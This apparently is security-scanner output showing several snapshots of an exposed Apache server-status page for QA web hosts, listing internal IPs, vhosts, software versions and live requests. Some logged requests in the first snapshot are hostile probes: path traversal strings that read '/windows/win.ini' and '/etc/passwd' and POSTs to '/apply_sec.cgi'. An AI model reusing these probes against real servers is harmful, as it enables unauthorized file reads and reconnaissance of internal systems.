Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 30-May-2024 13:28:24 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 22 days 23 hours 28 minutes 34 seconds Server load: 0.26 0.13 0.04 Total accesses: 1767816 - Total Traffic: 18.0 GB - Total Duration: 137910582 CPU Usage: u60.39 s189.54 cu2744.38 cs1704.29 - .237% CPU load .89 requests/sec - 9.5 kB/second - 10.7 kB/request - 78.0118 ms/request 43 requests currently being processed, 34 idle workers KK_KRKKK____K_K__KKR___K____KR___KKKKKKKKKK_K___K.__KR__KKK_K___ K__KKKKKWRK...K.............._._................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-01021059/345/17754K 1.047661478321132.41.28143.11 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 1-013608/191/16914K 0.69297921425153124.81.44170.85 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.css?v= HTTP/ 2-0246820/381/98511_ 1.12196128113090.02.01292.12 10.253.106.226http/1.1qa1-corporate.thermofisher.com:GET /../../../../../../../../windows/win.ini HTTP/1.1 3-02643956/123/16724K 0.29154121692798267.60.66197.85 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-076570/327/18308R 0.844651015584990.06.96206.12 10.253.106.203http/1.1 5-062322/235/18178K 0.68298252206029421.74.20232.03 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.css?v= HTT 6-0300065/258/18017K 0.713012176435111.01.02440.13 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-070348/227/16690K 0.7539583184670917.61.28192.37 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-0124780/495/17178_ 1.159457119970210.01.38264.73 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0325340/30/22091_ 0.06291112270080.00.06200.38 10.253.106.203http/1.1 10-0112430/231/17468_ 0.521451116113130.00.92453.40 10.253.106.226http/1.1 11-0325350/202/26750_ 0.66181413476740.00.81168.79 10.253.106.203http/1.1qa1-corporate.thermofisher.com:POST /content/2hC2cb94Yy5F9UwwGwQbNWLeGmP HTTP/1.1 12-01124536/307/16932K 0.682184051508311102.41.17283.61 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0112460/421/17681_ 1.07291013850460.02.08175.95 10.253.106.203http/1.1 14-01124730/202/18234K 0.77511161996463.11.42306.05 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-0279480/232/30043_ 0.69601117264250.01.25279.27 10.253.106.203http/1.1qa1-corporate.thermofisher.com:GET /?c=../../../../../../etc/passwd%00 HTTP/1.1 16-0115120/113/65323_ 0.2641616913410.00.38239.42 10.253.106.203http/1.1qa1-corporate.thermofisher.com:POST /content/2hC2cb94Yy5F9UwwGwQbNWLeGmP.af.internalsubmit.jso 17-0325362/194/16718K 0.392971117206056.70.44203.40 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-02676077/165/15625K 0.4195111502049170.50.48162.50 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-0115140/78/16331R 0.182301018260770.00.20343.44 10.253.106.203http/1.1 20-070390/234/16282_ 0.7339119912970.01.28214.43 100.70.4.142http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 21-0327050/128/17591_ 0.37149919219840.00.45173.10 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0268200/313/17811_ 1.072101415162320.02.03263.62 10.253.106.226http/1.1qa1-corporate.thermofisher.com:POST /apply_sec.cgi HTTP/1.1 23-01151532/268/16983K 0.78218215152094375.41.21236.58 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-070400/210/17202_ 0.701961514816340.01.61185.95 10.253.106.226http/1.1qa1-corporate.thermofisher.com:POST /apply_sec.cgi HTTP/1.1 25-0300070/268/17955_ 0.56301114820930.00.62221.48 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0264450/168/17571_ 0.5337114390960.01.10208.28 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2020.1.0. 27-084690/0/52713_ 0.0098015325750.00.00203.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0847041/296/16443K 0.891581241123645795.82.11160.35 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-033240/38/16288R 0.0633449319753680.00.08275.52 10.253.106.226http/1.1 30-033250/105/16354_ 0.261831716064140.00.25234.66 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/filters 31-061060/186/17770_ 0.46371411308810.00.79266.42 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2020.1.0.js 32-0300080/470/17284_ 1.051471016029180.01.18194.10 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-01767048278/48661/147728K 42.087058878489101.789.15295.39 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0610755/276/16345K 1.242187511655838124.92.85129.12 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-03000912/418/17651K 0.98218533233815426.31.36150.51 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0734716/244/16484K 0.74218457133237135.45.26166.08 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-01030648280/48410/59700K 33.2300138184489105.787.43177.28 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0273062/169/16073K 0.8029791150075346.81.46131.63 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.css?v 39-03056740/101/15211K 0.28014137435696.70.46180.21 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-02830351/363/14772K 1.34214121269668215.42.61191.76 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0264505/201/15622K 1.0415211176901111.12.60146.10 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0704416/153/14369K 0.4015810181627744.51.42262.55 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0116420/163/15310_ 0.431841414968680.00.61210.49 10.253.106.226http/1.1qa1-corporate.thermofisher.com:POST /apply_sec.cgi HTTP/1.1 44-0119135/255/14424K 0.743312116504011.01.25228.04 10.253.106.226http/1.1qa1.allergy
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c32a3d7fe
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 29-May-2024 10:24:47 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 21 days 20 hours 24 minutes 58 seconds Server load: 0.00 0.02 0.00 Total accesses: 1660732 - Total Traffic: 17.1 GB - Total Duration: 128922768 CPU Usage: u37.33 s149.03 cu2604.07 cs1623.06 - .234% CPU load .88 requests/sec - 9.5 kB/second - 10.8 kB/request - 77.6301 ms/request 40 requests currently being processed, 33 idle workers .KK._RK_.__R__K_.KR___..__..____RKR.KK_R.RRR___RK.__.RR.KKR_.K__ .._.KRRWR_.KKR___RRR_RR_._RK.................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/16748. 0.00333012781090.00.00133.45 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-01759825/29/16000K 0.19591358041626.20.72163.43 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 2-0323054/4/97167K 0.0122611705184394.10.38283.36 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0-0/0/15817. 0.00260015106210.00.00190.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-0127760/72/17144_ 0.25158013400970.00.86190.69 10.253.106.226http/1.1 5-0323070/0/16882R 0.00459018006020.00.00211.51 10.253.106.203http/1.1 6-0203477/26/16642K 0.042900152379650.70.11431.63 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/commercial 7-0150330/7/15719_ 0.001571017908000.00.02186.96 10.253.106.203http/1.1 8-0-0/0/15985. 0.00209019204030.00.00256.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-0317190/1/21159_ 0.00157111825050.00.16169.01 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-site.min.js HT 10-0135850/24/16116_ 0.171251115409990.04.60445.20 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0135860/36/25690R 0.182051012782990.00.58157.86 10.253.106.226http/1.1 12-0161640/6/15661_ 0.00157014376130.00.03273.35 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/dataTablesLoadMor 13-0177730/7/16291_ 0.01157713051250.00.26166.00 10.253.106.203http/1.1 14-0323094/4/17094K 0.001811112929038.90.01295.87 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-084790/14/28929_ 0.071571014967420.00.27272.69 10.253.106.226http/1.1 16-0-0/0/64477. 0.00181016416070.00.00233.33 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0892715/35/15581K 0.05211101650556399.40.55161.26 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-030510/47/14564R 0.234204114212170.00.82155.54 10.253.106.203http/1.1 19-089280/55/15324_ 0.17157017623470.00.77337.40 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 20-0172580/24/14905_ 0.08157017790380.00.23206.75 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base/resources 21-0314180/4/16458_ 0.00157018641350.00.03166.57 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 22-0-0/0/16642. 0.00150014192660.00.00240.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0-0/0/15990. 0.00322014654430.00.00227.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0162020/28/16017_ 0.05157113939750.00.19177.36 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/dataTablesRespons 25-0135890/6/16836_ 0.01157014382450.00.02215.88 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-magni 26-0-0/0/16245. 0.00161013562550.00.00200.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-0-0/0/51939. 0.00148013566320.00.00193.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0162040/8/14978_ 0.01157011682940.00.03152.47 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base/resources 29-089410/27/15235_ 0.21157619112180.00.56265.92 10.253.106.226http/1.1 30-0187440/83/15216_ 0.20158813919380.01.23179.85 10.253.106.203http/1.1 31-0135900/4/16625_ 0.04156810726340.00.31259.51 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base/resources 32-0323130/0/15879R 0.00458014101990.00.00185.83 10.253.106.226http/1.1 33-01767038537/38920/137987K 32.681057985971111.971.58277.82 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0323140/0/15192R 0.00458015990500.00.00121.02 10.253.106.203http/1.1 35-0-0/0/16552. 0.00156021490730.00.00144.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0124031/38/15173K 0.371143105844114.21.23154.21 10.253.106.226http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/header-par.html 37-01030638538/38668/49958K 24.4640137317471114.069.86159.71 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0178950/4/14996_ 0.021581014277990.00.08124.69 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 39-0131270/14/14400R 0.023881113090990.00.06165.85 10.253.106.226http/1.1 40-0-0/0/14007. 0.00355010778070.00.00157.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0323160/0/14452R 0.00458015623920.00.00133.10 10.253.106.203http/1.1 42-0323170/0/13392R 0.00458017218690.00.00182.28 10.253.106.203http/1.1 43-0323180/0/14625R 0.00458014098860.00.00205.07 10.253.106.203http/1.1 44-074030/36/13576_ 0.22158811263680.00.42220.00 10.253.106.226http/1.1 45-0135910/32/12886_ 0.40157014553390.01.31282.61 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/components/allergen_fact_sheet/clie 46-0273510/946/14148_ 2.75163713297930.011.75197.52 10.253.106.203http/1.1 47-0323190/0/14081R 0.00458012995670.00.00164.66 10.253.106.203http/1.1 48-01312825/46/11799K 0.1391291189748499.60.60187.58 10.253.106.203http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 49-0-0/0/13399. 0.0014709858960.00.00122.63 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879ce0caa8f3
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 28-May-2024 11:07:58 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 21 hours 8 minutes 8 seconds Server load: 0.00 0.03 0.01 Total accesses: 1564485 - Total Traffic: 16.3 GB - Total Duration: 122284745 CPU Usage: u50.07 s150.54 cu2451.13 cs1556.42 - .233% CPU load .867 requests/sec - 9.5 kB/second - 10.9 kB/request - 78.1629 ms/request 52 requests currently being processed, 40 idle workers RK_RK__R___.K.W.K_K_.___K___K_K_.K__.KKRRRR__RKKK._K_K_K___R_RKK RR________RKRRR_RRR.__..__K.K.KKRKKR.KRRR....................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0261520/12/15493R 0.072551012113780.00.24125.95 10.253.106.203http/1.1 1-0262326/209/15072K 0.5516010129538399.52.31157.54 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0241730/160/96093_ 0.39191296438910.05.56275.72 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 3-0246170/106/14973R 0.494824514047820.01.67179.78 10.253.106.226http/1.1 4-020551/275/16187K 0.94105812838312.33.95184.10 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 5-0251130/43/15798_ 0.09172016738650.00.25202.42 100.70.7.81http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 6-068320/724/15893_ 2.31113014844630.07.45426.01 10.253.106.226http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/footer-par.html 7-0264770/19/14800R 0.074825017269140.00.16179.95 10.253.106.226http/1.1 8-0176850/49/15058_ 0.091912418550200.00.33250.59 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/dataTa 9-0264780/11/19863_ 0.011912710986530.00.03156.86 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/lazylo 10-0184460/114/15001_ 0.3719113014768990.01.36432.83 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/clientlib-all 11-0-0/0/25011. 0.00169012277840.00.00153.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0264792/32/14713K 0.061799139020212.30.68265.73 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/dataTablesLoadMore.min.js H 13-0-0/0/15234. 0.00189012513150.00.00150.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-0273211/555/15907W 1.4600123990518.23.23287.62 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 15-0-0/0/27856. 0.00188014284290.00.00261.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-02676515/18/63637K 0.024511153432563.70.07229.10 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0207150/600/14911_ 1.6914232216067190.09.04155.21 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/handlebars/compiled/templ 18-0246212/126/13855K 0.63179591365553105.31.76146.32 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/e_catalog/cl 19-0196550/112/14365_ 0.191428917092380.00.55329.95 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.css?v= HTTP/ 20-0-0/0/14019. 0.00190017139870.00.00198.45 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0125010/93/15438_ 0.201911018080400.03.66159.28 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 22-013610/508/15879_ 1.351911013776700.03.47235.99 10.253.106.203http/1.1 23-0241760/376/15085_ 1.03191814152080.03.45221.70 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 24-02681212/19/14894K 0.02411861325948383.10.39169.78 10.253.106.203http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 25-0262350/103/15818_ 0.221428513797280.00.67203.50 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.css?v 26-0268130/16/15231_ 0.081911713139910.00.17188.72 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 27-0180320/790/50738_ 2.361424212262430.020.07185.02 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 28-0246221/193/14045K 0.42179610930463.14.32141.65 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap-multiselect.min.c 29-0176860/61/14593_ 0.13191999718753980.00.37241.31 10.253.106.203http/1.1 30-013842/579/14503K 1.4717912135436113.78.48174.97 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap-multiselect.min.j 31-027480/489/15546_ 1.27191810164260.02.87253.85 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/toolti 32-0-0/0/14848. 0.00170013538250.00.00178.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-01767030156/30539/129606K 28.071057508555639.956.47262.71 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0302590/213/14622_ 0.681912615554300.02.31115.02 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 35-061690/901/15313_ 2.871911820262780.09.02136.30 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 36-0-0/0/14454. 0.00187010114010.00.00145.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-01030630157/30287/41577K 19.9440136853455642.054.75144.60 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0245627/633/14500K 2.671799139820842.68.02121.23 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_hea 39-0262360/145/13565R 0.2442555612567950.01.31159.49 10.253.106.226http/1.1 40-0293490/0/12749R 0.0042508782510.00.00144.58 10.253.106.226http/1.1 41-027500/418/13469R 1.264828414532530.03.65127.25 10.253.106.203http/1.1 42-090250/1/12760R 0.00464016786280.00.00175.29 10.253.106.203http/1.1 43-0207680/258/13914_ 0.74191713711540.02.55138.37 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/uti 44-0161290/50/12587_ 0.20191510771300.00.95213.52 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 45-0196560/152/12158R 0.444823514038210.09.07275.85 10.253.106.203http/1.1 46-01613017/60/12645K 0.1813101245525242.00.51183.20 10.253.106.203http/1.1qa1.allergyinsider.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cb9390f50
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 27-May-2024 00:34:14 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 19 days 10 hours 34 minutes 24 seconds Server load: 0.08 0.03 0.01 Total accesses: 1469811 - Total Traffic: 15.0 GB - Total Duration: 115250538 CPU Usage: u33.68 s128.73 cu2311.08 cs1476.68 - .235% CPU load .875 requests/sec - 9.3 kB/second - 10.7 kB/request - 78.4118 ms/request 37 requests currently being processed, 37 idle workers __KRR_K_KK_K_KR__..R.K.K.__.K____K.R.K..K_WRR_K.KRR.._..K...._._ _K_R_.KKKK____._..__..__.__R_K_R_R._KK.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0157730/40/14808_ 0.222809311653600.00.70119.32 10.253.106.226http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 1-0157740/13/13990_ 0.04961412051730.00.28145.87 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/product 2-01577516/47/94991K 0.4310551557898648.51.16256.31 10.253.106.203http/1.1www-qa.patheon.jp:80GET /insights-resources/fact-sheets/pre-filled-syringe-assembly 3-0146060/10/14274R 0.035341112083420.00.14170.60 10.253.106.226http/1.1 4-0173250/169/14954R 1.033663911801080.06.33167.98 10.253.106.203http/1.1 5-0115870/46/14998_ 0.17351315311930.00.40194.69 10.253.106.226http/1.1 6-0191114/8/14986K 0.021551214123099.00.13415.79 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 7-0291950/44/14022_ 0.15283136716582570.00.66171.14 10.253.106.203http/1.1www-qa.patheon.jp:80GET /insights-resources HTTP/1.1 8-01911211/17/14298K 0.0895171783678510.30.60212.59 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/filters 9-02731812/324/18909K 1.1095935103683098.02.91144.95 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /phadia/wo/zh/product-catalog.html?articleNumber=14-5600-03 10-0191130/14/14061_ 0.04951414081830.00.23403.79 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/product 11-0292322/71/24060K 0.3010921155519159.31.01142.51 10.253.106.203http/1.1www-qa.patheon.jp:80GET /akamai/sureroute-test-object.html HTTP/1.1 12-0292330/27/13675_ 0.1328020312843810.00.44253.86 10.253.106.226http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/blog/work-smarter-not-harder-acce 13-01468714/106/14487K 0.4480111194509722.01.96142.09 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-0224910/204/14968R 0.865121211528850.020.89253.56 10.253.106.226http/1.1 15-0150930/42/27046_ 0.15151012374510.00.56247.26 10.253.106.203http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/sites/cincinnati-oh.html HTTP/1.1 16-0242440/332/62836_ 1.0423195914673570.05.66209.11 10.253.106.226http/1.1www-qa.patheon.jp:80GET /akamai/sureroute-test-object.html HTTP/1.1 17-0-0/0/14006. 0.004097014505490.00.00142.55 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0-0/0/13091. 0.003782013124800.00.00128.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0173300/47/13288R 0.133848915578670.00.47308.89 10.253.106.226http/1.1 20-0-0/0/13182. 0.003779015780520.00.00183.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0292356/72/14648K 0.2721811173191347.11.12142.13 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0-0/0/15025. 0.004374013184840.00.00227.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0282667/100/13995K 0.431198133071045.62.10208.87 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 24-0-0/0/14110. 0.004096012677880.00.00160.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0115910/52/14868_ 0.17251213009180.00.74181.17 10.253.106.226http/1.1 26-0295560/76/14380_ 0.34641212459820.01.27169.78 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0-0/0/49663. 0.003793011599790.00.00160.93 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0295582/39/13096K 